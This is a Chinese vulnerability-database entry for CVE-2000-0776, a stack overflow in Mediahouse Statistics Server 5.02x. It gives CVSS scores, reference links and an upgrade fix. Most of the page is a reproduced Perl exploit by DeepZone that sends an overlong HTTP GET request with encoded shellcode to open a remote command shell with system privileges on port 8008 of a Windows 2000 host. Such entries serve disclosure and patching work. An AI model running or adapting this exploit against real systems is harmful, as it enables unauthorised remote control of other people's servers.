CVE-2000-0776
CVSS7.5
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:51
NMCOE    

[原文]Mediahouse Statistics Server 5.02x allows remote attackers to execute arbitrary commands via a long HTTP GET request.


[CNNVD]Mediahouse Statistics Server执行命令漏洞(CNNVD-200010-064)

        Mediahouse Statistics Server 5.02x版本存在漏洞。远程攻击者可以借助超长HTTP GET请求执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0776
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0776
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-064
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1568
(VENDOR_ADVISORY)  BID  1568
http://archives.neohapsis.com/archives/bugtraq/2000-08/0118.html
(VENDOR_ADVISORY)  BUGTRAQ  20000810 [DeepZone Advisory] Statistics Server 5.02x stack overflow (Win2k remote exploit)
http://xforce.iss.net/static/5113.php
(UNKNOWN)  XF  mediahouse-stats-livestats-bo(5113)

- 漏洞信息

Mediahouse Statistics Server执行命令漏洞
高危 未知
2000-10-20 00:00:00 2005-08-17 00:00:00
远程  
        Mediahouse Statistics Server 5.02x版本存在漏洞。远程攻击者可以借助超长HTTP GET请求执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20148)

MediaHouse Software Statistics Server LiveStats 5.2 Buffer Overflow Vulnerability (EDBID:20148)
windows remote
2000-08-10 Verified
0 Zan
N/A [点击下载]
source: http://www.securityfocus.com/bid/1568/info

Mediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code.


#!/usr/bin/perl -w
# Statistics Server 5.02x's exploit. 
# usage: ./ssexploit502x.pl hostname port
# 00/08/10
# http://www.deepzone.org
# http://deepzone.cjb.net       
# http://mareasvivas.cjb.net  (|Zan homepage)
#
# --|Zan <izan@deepzone.org>
# ----------------------------------------------------------------
#
# This exploit works against Statistics Server 5.02x/Win2k.
#
# Tested with Win2k (spanish version).
#
# It spawns a remote winshell on 8008 port. It doesn't kill
# webserver so webserver continues running while hack is made.
# When hack is finished webserver will run perfectly too.
#
# Default installation gives us a remote shell with system
# privileges.
#
# overflow discovered by
# -- Nemo <nemo@deepzone.org>
#
# exploit coded by
# -- |Zan <izan@deepzone.org>
#
# ----------------------------------------------------------------

use IO::Socket;


@crash = (
"\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
"\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
"\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
"\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
"\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
"\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
"\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
"\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
"\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
"\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
"\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
"\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
"\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
"\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
"\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
"\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
"\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
"\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
"\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
"\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
"\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
"\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
"\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
"\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
"\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
"\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
"\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
"\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
"\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
"\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
"\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
"\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
"\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
"\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
"\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
"\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
"\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
"\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
"\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
"\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
"\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
"\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
"\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
"\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
"\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
"\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
"\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
"\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
"\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
"\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
"\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
"\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
"\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
"\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
"\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
"\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
"\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
"\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
"\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
"\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
"\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
"\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
"\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
"\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
"\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
"\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
"\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
"\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
"\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
"\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
"\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
"\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
"\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
"\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
"\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
"\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
"\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
"\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
"\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
"\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
"\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
"\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
"\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
"\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
"\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
"\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
"\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
"\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
"\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
"\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
"\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");

# -------------------------------------------------------------------

sub pcommands
{
	die "usage: $0 hostname port\n" if (@ARGV != 2);
	($host) = shift @ARGV;
	($port) = shift @ARGV;
}

sub show_credits
{
	print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\n";
	print "\n\t\t  Coded by |Zan - izan\@deepzone.org\n";
	print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-\n\n";
}

sub bofit
{

	print "\nspawning remote shell on port 8008 ...\n\n";

	$s = IO::Socket::INET->new(PeerAddr=>$host,
                                   PeerPort=>$port,
				   Proto=>"tcp");

	if(!$s) { die "error.\n"; }	

	print $s "GET http://O";

	foreach $item (@crash) {
        	print $s $item
              } 

	for ($cont=0; $cont<840;$cont++) {
		print $s "\x90"
              }

	print $s "\x8c\x3e\x1d\x01";

	print $s "\r\n\r\n";

	while (<$s>) { print }

	print "... done.\n\n";

}

# ----- begin

show_credits;
pcommands;
bofit;

# ----- that's all :)
		

- 漏洞信息

1507
Mediahouse Statistics Server HTTP GET Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-08-10 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 5.03 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站